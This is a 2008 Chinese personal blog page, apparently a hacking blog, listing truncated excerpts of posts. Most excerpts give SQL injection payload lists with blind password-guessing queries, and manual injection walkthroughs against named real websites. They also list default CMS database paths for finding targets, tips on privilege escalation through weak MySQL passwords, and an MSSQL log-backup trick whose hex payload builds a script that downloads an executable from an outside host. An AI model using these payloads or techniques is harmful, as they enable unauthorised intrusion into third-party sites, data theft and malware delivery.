情深_B1og
百度空间 | 百度首页 
 
文章列表
 
2008-05-09 13:14

' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
' and LENGTH(pa

 
2008-03-17 14:32
与asp手工注入大同小异.在猜解的时候.我们可以用工具也可以用手工.原理是一样的.为了方便我们可以使用工具.

1。比如找到一个php注入点:http://xxxxx.sohu.com/xxxx.php?brand_id=1

and 1=1 回显正常,and 1=2 回显与第一页不一样.说明有注入点。

2。进行猜解:http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

注:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 这就是传说中的 Ascii逐字解码法

我们举个例子,已知表Ad
 
2008-03-17 14:24
默认数据库: Databases/myszw.mdb Databases/myszw1.mdb

上传 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1
----------------------------------------------------
关键字:网站建设公司企业网站管理系统
后缀: admin/login.asp
--------------------

 
2008-03-17 14:21

在百度空间里插入一个框架网页,没有其他办法,毕竟不能编辑自己的空间的html源代码,所以只有靠修改你的空间的html文件所引用的CSS文件来实现了。百度也给客户提供了自己编辑CSS的功能,所以大家的空间都变的丰富多彩起来,通过CSS文件的修改可以实现很多功能,比如鼠标指针样式,插入天气预报,加入QQ连接图标====

现在我来讲一下,如何修改CSS,给你的百度空间里插入一个框架网页的方法,一般可引用的为asp,php,xml类型,据本人严格测试,无法插入htm,html 切记

首先, 点『设置』按钮,再点下面的『

 
2008-03-17 13:45
这些都是最基本的东西,EST的大哥们就不用参合了,呵呵~~~
PHP注入不象ASP那样有NBSI之类的超强工具,其实知道他的注入原理后,完全可以实现手工注入
 
2008-03-17 13:43
目标网站:http://www.atextile.org.cn:81
注入点: http://www.atextile.org.cn:81/news.php?id=780

1.认识注入类型

不管是asp.aspx.php,注入的标准类型必为
http

 
2008-03-10 15:59
S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?

利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。

WEBSHELL获得了,找用户和密码也不
 
2008-02-29 19:40
别怪我卖关子,我要先谈谈“常规”的入侵方法是什么。咱得照顾一下初学者嘛。
撇开NT不谈,这次只谈UNIX。一般来说确定目标后,就开始分析它。可以使用FINGER指令看看它上面有些什么用户,然后逮着那
些看起来简单的用常用的词试一试(甚至可以用帐号本身),要不就用台湾那个黑客写的LETMEIN(不是KILLUSA写的)暴力往里冲;
或者用HAKTEK分析一下目标的端口,如果开着FTP,那么就用FTP的常见漏洞如GUEST帐号开放进入,有些WU-FTP的CORE漏洞还可获得
SHADOW;如果开着SENDMAIL也一样,很多SENDMAIL程序
 
2008-02-29 19:38
alter database w37910com set RECOVERY FULL-- //打开开关
create table cmd (a image)-- //新建一个名为CMD的表和一个名为A的字段
backup log w37910com to disk = 'c:\cmd1' with init-- //备份到C盘
insert into cmd(a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E33373931302E636F6D2F312E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A7365742
 
2008-02-29 19:35

渗透已经发表在黑客手册2008年第三期

最近一直比较关注PHP注射的东西.学习好几天了.也应该实战一下了.目标http://app.xxxx.com .一个市场调查的门户.找注射点嘛,还是要用我们可爱的搜索引擎.为什么可爱呢?一会就知道了.Go Go Go !!!!!

在google中搜索php?id= site:xxx.com.意思就是说搜索XXX网站中以php?id=的URL.嘿.还真让我找到一个.

 
     
 
 
个人档案
 
jvsxiao

河北 邯郸 
上次登录:
9月 5日
加为好友
 
   
 
文章分类
 
 
 
 
     
 
最新评论
 
文章评论|照片评论


情深SB 我来看你了
 
     
 
好友最新文章
 
     
 
最近访客
 
 

mn258963

good_bye_hack

大糊涂丫头

邯郸啦

dzy707

anubis_zcl

异世界神

中國式_再見
     
 
背景音乐
 
 
留言板
 
 
姓 名:    注册
网 址: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      
   
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu